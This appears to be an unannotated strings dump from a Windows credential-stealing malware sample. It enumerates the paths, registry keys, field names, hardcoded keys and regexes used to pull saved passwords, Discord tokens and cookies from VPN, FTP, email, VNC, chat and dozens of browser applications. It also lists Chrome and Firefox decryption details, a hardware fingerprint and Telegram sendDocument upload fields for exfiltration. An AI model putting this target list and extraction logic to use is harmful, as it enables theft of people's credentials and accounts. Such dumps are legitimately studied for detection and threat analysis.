USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
ProgramFiles(x86)
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
%ProgramW6432%
Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
quick.dat
Sites.dat
\FlashFXP\
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
Server
SystemDrive
\FTP Navigator\Ftplist.txt
No Password
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
\cftp\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
;Port=
;Password=
;User=
;Anonymous=
\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
;Server=
FTPGetter
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
COMPlus_legacyCorruptedStateExceptionsPolicy
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
eM Client\accounts.dat
o6806642kbM7c5
Mailbird
SenderIdentities
Server_Host
Username
EncryptedPassword
\Mailbird\Store\Store.db
RealVNC 3.x
Software\ORL\WinVNC3
TightVNC
Software\TightVNC\Server
PasswordViewOnly
SOFTWARE\RealVNC\vncserver
TightVNC ControlPassword
ControlPassword
TigerVNC
Software\TigerVNC\Server
RealVNC 4.x
SOFTWARE\RealVNC\WinVNC4
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordcanary
discordptb
Local Storage\leveldb
origin_url
username_value
Opera Stable
"encrypted_key":"(.*?)"
\Local State
\Default\Login Data
\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
logins.json
[^\u0020-\u007F]
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Password:
Host:
Username:
Application:
<br>Password:
<br>Username:
<br>Application:
<br><hr>
Amigo\User Data
Iridium Browser
Iridium\User Data
CyberFox
\8pecxstudios\Cyberfox\
Orbitum
Orbitum\User Data
Coccoc
CocCoc\Browser\User Data
360 Browser
360Chrome\Chrome\User Data
Cool Novo
MapleStudio\ChromePlus\User Data
uCozMedia\Uran\User Data
Sputnik
Sputnik\Sputnik\User Data
BraveSoftware\Brave-Browser\User Data
CentBrowser
CentBrowser\User Data
Thunderbird
\Thunderbird\
WaterFox
\Waterfox\
Chrome
Google\Chrome\User Data
SeaMonkey
\Mozilla\SeaMonkey\
Postbox
\Postbox\
IceCat
\Mozilla\icecat\
IceDragon
\Comodo\IceDragon\
Liebao Browser
liebao\User Data
Chromium
Chromium\User Data
QIP Surf
QIP Surf\User Data
Comodo Dragon
Comodo\Dragon\User Data
Opera Browser
Opera Software\Opera Stable
PaleMoon
\Moonchild Productions\Pale Moon\
Edge Chromium
Microsoft\Edge\User Data
Vivaldi
Vivaldi\User Data
7Star\7Star\User Data
Kometa
Kometa\User Data
Epic Privacy
Epic Privacy Browser\User Data
Torch Browser
Torch\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
BlackHawk
\NETGATE Technologies\BlackHawk\
K-Meleon
\K-Meleon\
Coowon
Coowon\Coowon\User Data
Citrio
CatalinaGroup\Citrio\User Data
Firefox
\Mozilla\Firefox\
Elements Browser
Elements Browser\User Data
Chedot
Chedot\User Data
Yandex Browser
Yandex\YandexBrowser\User Data
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
Cookies
Network\Cookies
host_key
expires_utc
is_httponly
is_secure
samesite
encrypted_value
cookies
cookies.sqlite
expiry
isHttpOnly
isSecure
sameSite
moz_cookies
\Default\
{0:X2}
OBJECTIDENTIFIER
SEQUENCE {
INTEGER
OCTETSTRING
Windows Credential
policy
{{{0}}}
chrome
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
fecdc682-d4a5-4937-8a72-b8641212a6b8
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
7f3e630f-f602-441b-822d-b401ff75f42e
Win32_BaseBoard
SerialNumber
8bc2a14b-d36a-48b6-9c6e-4ef4fa639583
chat_id
caption
yyyy-MM-dd HH-mm-ss
sendDocument
document
---------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}"
Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
FormatID: {0}
StorageSize: {0} (0x{0:X})
Version: 0x{0:X}
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Version is not equal to {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Size of the SerializedPropertyStore is less than {0} ({1})
Value: {0}